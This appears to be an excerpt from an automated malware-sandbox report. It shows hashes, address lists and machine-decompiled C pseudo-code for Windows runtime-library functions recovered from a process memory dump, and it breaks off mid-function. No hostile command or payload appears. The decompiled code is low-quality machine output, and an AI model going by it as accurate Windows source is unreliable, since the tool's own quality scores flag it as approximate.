0x0541fa91
0x053c2e6f
0x053c2e6f
0x053c2e5f
0x0541fa13
0x0541fa15
0x0541fa17
0x0541fa1f
0x0541fa21
0x0541fa22
0x0541fa25
0x0541fa28
0x0541fa2f
0x0541fa2f
0x0541fa2a
0x0541fa2a
0x0541fa2a
0x0541fa31
0x0541fa34
0x0541fa36
0x0541fa3c
0x0541fa3e
0x0541fa41
0x0541fa43
0x0541fa45
0x0541fa45
0x0541fa41
0x0541fa3c
0x0541fa4a
0x0541fa4f
0x0541fa51
0x0541fa53
0x0541fa56
0x0541fa5b
0x0541fa5e
0x00000000
0x0541fa5e
0x053c2e23

Strings

RTL: Re-Waiting, xrefs: 0541FA4A

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 1a5312d6f420b8ad7356dc69fb14112e0487bbfb77a7e99245c919138864089a
Instruction ID: 51343de42bbfd93ac07e4f878670867e3b41020f6352cc87091df38881b9bcf6
Opcode Fuzzy Hash: 1a5312d6f420b8ad7356dc69fb14112e0487bbfb77a7e99245c919138864089a
Instruction Fuzzy Hash: 04614571B04644ABDB21DB68C844BBF7BA6FB41350F1402EEE852A73C1D7749D0687A1

Uniqueness

Uniqueness Score: -1.00%

Function 05490EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E05490EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0548FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E05491074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E05409730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0548A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0548A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x54b8b04 >> 0x14) + (_v44 -  *0x54b8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E053E7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0548138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E053E7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0547FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x54b8724 & 0x00000008) != 0) {
						E054852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E054915B5(0x54b8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x05490eb7
0x05490eb9
0x05490ec0
0x05490ec2
0x05490ecd
0x0549105b
0x0549105b
0x05491061
0x05491066
0x05491066
0x0549106b
0x05491073
0x05491073
0x05490ed3
0x05490ed6
0x05490edc
0x05490ee0
0x05490ee7
0x05490ef0
0x05490ef5
0x05490efa
0x05490efc
0x05490efd
0x05490f03
0x05490f04
0x05490f06
0x05490f07
0x05490f09
0x05490f0e
0x05490f14
0x05490f23
0x05490f2d
0x05490f34
0x05490f34
0x05490f14
0x05490f52
0x00000000
0x00000000
0x05490f58
0x05490f73
0x05490f74
0x05490f79
0x05490f7d
0x05490f80
0x05490f86
0x05490fab
0x05490fb5
0x05490fc6
0x05490fd1
0x05490fe3
0x05490fd3
0x05490fdc
0x05490fdc
0x05490feb
0x05491009
0x05491009
0x05491015
0x05491027
0x05491017
0x05491020
0x05491020
0x0549102f
0x0549103c
0x0549103c
0x05491048
0x05491050
0x05491050
0x05491055
0x00000000
0x05491055
0x05490f88
0x05490f9e
0x05490fa2
0x05490fa9
0x00000000
0x00000000
0x00000000
0x05490fa9
0x00000000

Strings

`, xrefs: 05490F16

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 01a5858e2e21b6c1914432e51920c416ee566af4cb2ddede009660a69b360e1b
Instruction ID: e683da964521c8f6ef1b6c198304ebe02519846993944f6884aa8f9791c943d9
Opcode Fuzzy Hash: 01a5858e2e21b6c1914432e51920c416ee566af4cb2ddede009660a69b360e1b
Instruction Fuzzy Hash: 1351DF713083429FDB29DF29D889BABBBE5FBC4204F04092EF94687684D671E905C721

Uniqueness

Uniqueness Score: -1.00%

Function 053FF0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E053FF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E053E4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E05409830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E05409990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E054095D0();
							goto L11;
						} else {
							_t109 = L053E4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0540F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E054095D0();
										L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x053ff0d3
0x053ff0d9
0x053ff0e0
0x053ff0e7
0x053ff0f2
0x053ff0f4
0x053ff0f8
0x053ff100
0x053ff108
0x053ff10d
0x053ff115
0x053ff116
0x053ff11f
0x053ff123
0x053ff124
0x053ff12c
0x053ff130
0x053ff134
0x053ff13d
0x053ff144
0x053ff14b
0x053ff152
0x0543bab0
0x0543bab0
0x053ff158
0x053ff158
0x053ff15a
0x053ff160
0x053ff165
0x053ff166
0x053ff16f
0x053ff173
0x0543baa7
0x0543baa7
0x0543baab
0x00000000
0x053ff179
0x053ff18d
0x053ff191
0x0543baa2
0x00000000
0x053ff197
0x053ff19b
0x053ff1a2
0x053ff1a9
0x053ff1af
0x053ff1b2
0x053ff1b6
0x053ff1b9
0x053ff1c4
0x053ff1d8
0x053ff1df
0x053ff1e3
0x053ff1eb
0x053ff1ee
0x053ff1f4
0x053ff20f
0x0543bab7
0x0543babb
0x0543bacc
0x0543bad1
0x053ff215
0x053ff218
0x053ff226
0x053ff22b
0x00000000
0x053ff22b
0x053ff1f6
0x053ff1f6
0x053ff1f9
0x053ff1fb
0x053ff1fb
0x053ff1f4
0x053ff191
0x053ff173
0x053ff152
0x053ff203

Strings

@, xrefs: 053FF124

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 1318421fdd6b1ca4c5a7be09acb552219910247fb30722d5793f397f4aa22b74
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 4D518E71604710AFC321DF29C841A6BBBF9FF48710F10892EFA95976A0E7B4E914CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05443540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E05443540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x54bd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E05400BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E05443706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0540FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E05443540;
						E0540FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0541DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E05450C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E054097C0();
					}
					return E0540B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E05443971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E05443884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0540FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E05409650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E05443787(_a4,  &_v352, _t80);
						}
					}
					L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E054095D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x05443552
0x0544355a
0x0544355d
0x05443566
0x05443567
0x0544357e
0x0544358f
0x054435a1
0x054435a5
0x0544366b
0x0544366b
0x0544366d
0x05443672
0x05443679
0x05443685
0x0544368d
0x0544369d
0x054436a7
0x054436b8
0x054436c6
0x054436c7
0x054436dc
0x054436e1
0x054436e7
0x054436e9
0x054436e9
0x05443703
0x05443703
0x054435b5
0x054435c0
0x054435c4
0x00000000
0x00000000
0x054435ca
0x054435d7
0x054435e2
0x054435e6
0x054435e8
0x054435f5
0x054435fa
0x05443603
0x05443604
0x05443609
0x0544360a
0x05443612
0x05443613
0x0544361e
0x05443622
0x05443628
0x0544362f
0x0544362f
0x05443636
0x05443638
0x0544363b
0x05443642
0x05443642
0x05443636
0x05443657
0x05443657
0x0544365c
0x05443662
0x05443669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0544358F

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 37446a217170e807443abb17f1a7e29ec3b8d59cd66e2934c5d1609dd897de33
Instruction ID: 46d625677483fbb53a07abe42516e8107e331f381df07591bd6450a5404d0425
Opcode Fuzzy Hash: 37446a217170e807443abb17f1a7e29ec3b8d59cd66e2934c5d1609dd897de33
Instruction Fuzzy Hash: 444126B1D4052D9BEB21DE51CC85FEEB77CAB44714F1045AAEA09A7281DB309E888F94

Uniqueness

Uniqueness Score: -1.00%

Function 054905AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E054905AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E054907DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E05409730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0548A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0548A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E05491293(_t79, _v40, E054907DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E053E7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0548138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x054905c5
0x054905ca
0x054905d3
0x054906db
0x054906db
0x054906dd
0x054906e3
0x054906e3
0x054905dd
0x054905e7
0x054905f6
0x05490600
0x05490607
0x05490610
0x05490615
0x0549061a
0x0549061c
0x0549061e
0x05490624
0x05490625
0x05490627
0x05490628
0x05490631
0x05490640
0x0549064d
0x05490654
0x05490654
0x05490631
0x0549066d
0x05490674
0x00000000
0x00000000
0x05490692
0x0549069e
0x054906b0
0x054906a0
0x054906a9
0x054906a9
0x054906b8
0x054906d6
0x054906d6
0x00000000

Strings

`, xrefs: 05490633

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: a88a51d589754adc81d4c25cca4963c2c8f8e79bfcc71cdb6098935a8b6adb90
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 0531F032304345ABEB14DE26CC4AFDB7B99BBC4754F04422AF9499B280D770ED04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05443884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E05443884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E05409650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L053E4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E05409650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x05443893
0x05443896
0x05443899
0x0544389f
0x054438a0
0x054438a4
0x054438a9
0x054438ac
0x054438ad
0x054438ae
0x054438af
0x054438b1
0x054438b4
0x054438bb
0x054438bc
0x054438bd
0x054438c4
0x054438c8
0x054438ca
0x054438ca
0x054438d5
0x0544393e
0x05443940
0x05443942
0x05443952
0x05443954
0x05443961
0x05443961
0x05443967
0x0544396e
0x0544396e
0x05443947
0x0544394c
0x00000000
0x0544394c
0x054438ea
0x054438ee
0x054438f8
0x054438f9
0x054438ff
0x05443900
0x05443902
0x05443903
0x0544390b
0x0544390f
0x05443950
0x00000000
0x05443950
0x05443915
0x0544391d
0x0544391d
0x05443922
0x05443926
0x00000000
0x05443928
0x0544392b
0x0544392b
0x05443935
0x05443937
0x05443937
0x00000000
0x05443935
0x05443926
0x054438f0
0x00000000

Strings

BinaryName, xrefs: 054438B4

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 94c4ec75418689a137c935aee6ce2253cd833060310e9c517d1036afe366d6e5
Instruction ID: 7fd0d45a884ee484f71e052c85e746f93ed2ff97c4333ad6e4d4715707fa3537
Opcode Fuzzy Hash: 94c4ec75418689a137c935aee6ce2253cd833060310e9c517d1036afe366d6e5
Instruction Fuzzy Hash: 2A31E03294451ABFEB15DE59C945EBFB7B5FB80B20F01496AE815A7390D7309E80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 053FD294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E053FD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x54bd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E053E4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0540B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E054098D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E054095D0();
					L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x053fd29c
0x053fd2a6
0x053fd2b1
0x053fd2b5
0x053fd2b6
0x053fd2bc
0x053fd2bd
0x053fd2be
0x053fd2bf
0x053fd2c2
0x053fd2c4
0x053fd2cc
0x053fd384
0x053fd34b
0x053fd34f
0x053fd350
0x053fd351
0x053fd35c
0x053fd35c
0x053fd2d6
0x053fd2da
0x053fd2e1
0x053fd361
0x053fd369
0x053fd36d
0x053fd2e3
0x053fd2e3
0x053fd2e3
0x053fd2e5
0x053fd2ed
0x053fd2f5
0x053fd2fa
0x053fd302
0x053fd303
0x053fd30b
0x053fd30f
0x053fd313
0x053fd318
0x053fd31c
0x053fd320
0x053fd379
0x053fd37d
0x00000000
0x00000000
0x0543affe
0x0543b001
0x0543b011
0x00000000
0x053fd322
0x053fd322
0x053fd330
0x053fd337
0x053fd35d
0x053fd339
0x053fd33f
0x053fd38c
0x053fd38c
0x053fd33f
0x053fd349
0x00000000
0x053fd349

Strings

@, xrefs: 053FD303

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: a82e62bccff120c4d553383591f6b68ee9b5cb68da37f0ec707567fc01e9c789
Instruction ID: 753d9bec58a47bba59eea9be4d71d186745d1d975b43ddbaee359e0a51295419
Opcode Fuzzy Hash: a82e62bccff120c4d553383591f6b68ee9b5cb68da37f0ec707567fc01e9c789
Instruction Fuzzy Hash: 363191B26083059FC711DF69C988EABBBE9FB89654F00092FFA9593250D634DD05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 053D1B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E053D1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0540BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0540A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0540A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L053E4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x053d1b8f
0x053d1b9a
0x053d1b9c
0x053d1b9e
0x053d1ba3
0x05427010
0x05427010
0x00000000
0x053d1ba9
0x053d1ba9
0x053d1bae
0x00000000
0x053d1bc5
0x053d1bca
0x053d1bcf
0x053d1bd0
0x053d1bd1
0x053d1bd2
0x053d1bd6
0x053d1bdc
0x053d1be0
0x05426ffc
0x05427000
0x00000000
0x05427006
0x05427009
0x05427009
0x053d1be6
0x053d1bec
0x053d1c0b
0x053d1c0b
0x053d1c0c
0x053d1c11
0x053d1c12
0x053d1c15
0x053d1c1b
0x053d1c1f
0x053d1c31
0x053d1c33
0x05427026
0x05427026
0x053d1c21
0x053d1c24
0x053d1c24
0x053d1bee
0x053d1bee
0x053d1bf2
0x053d1c3a
0x053d1bf4
0x053d1bf4
0x053d1c05
0x053d1c05
0x053d1c09
0x053d1c3e
0x00000000
0x00000000
0x00000000
0x053d1c09
0x053d1bec
0x053d1be0
0x053d1bae
0x053d1c2e

Strings

WindowsExcludedProcs, xrefs: 053D1BC5

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: fdc175497fd0ac2512aaad8ebf3c38b4592588ed87ea725f8f3b54dd1bded254
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: C221D077A04238ABCB22DE569884FAFF7BEEB81A50F164466E9059B200D630D904C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 053EF716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053EF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
